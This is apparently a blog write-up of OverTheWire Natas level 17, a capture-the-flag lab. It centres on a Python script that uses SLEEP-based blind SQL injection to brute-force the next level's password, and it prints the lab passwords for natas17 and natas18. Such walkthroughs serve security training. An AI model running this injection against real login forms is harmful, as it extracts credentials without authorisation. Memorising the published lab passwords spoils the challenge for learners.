OverTheWire:- Updated Natas Walkthrough — Level 17

Samxia99
3 min readApr 6, 2024

--

Hello everyone, I would like to share how I solved Nastas CTF also Here is the updated password, I hope this write-up will be helpful.

hello Folks!!! it’s a samxia99

My Bio link:-https://beacons.ai/samxia99

Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.

Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!

Natas Level 16 → Level 17

  • Here are the login details.
Username: natas16
URL: http://natas16.natas.labs.overthewire.org
  • After logging in we can see this page.
  • let’s view the source code.
  • This level is Time Based Blind SQL Injection type we can guess from the source code. so let’s try to brute force this level to be like other SQL levels. Here is the script saved as .py and brute force in the terminal using Python.
import requests
import re
from time import *

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

username = "natas17"
password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"

Url = "http://natas17.natas.labs.overthewire.org"

session = requests.session()

current_password = list()

while(True):
for character in characters:
print("Trying with: " + "".join(current_password) + character)
startTime = time()
response = session.post(Url, data={"username": 'natas18" AND password LIKE BINARY "' + "".join(current_password) + character + '%" AND SLEEP(2) #'},auth=(username, password))
endTime = time()
if endTime - startTime > 2:
current_password.append(character)
break
if len(current_password) == 32:
break
  • This brute force will take some time and we will get the password at the end.
  • Boom!!! Here we get the password to the next level.
Pass:-8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq

Hopefully, this write-up will be useful for everybody, I have tried to make it easy to read.

Next level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-18-bd9184479518

Previous level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-16-d3cb5b3f6c2e

PS:- THANKS FOR READING

--

--

Samxia99

This is for me to document my journey through hacking, CTFs and Hacker tool's | i also love to read novel.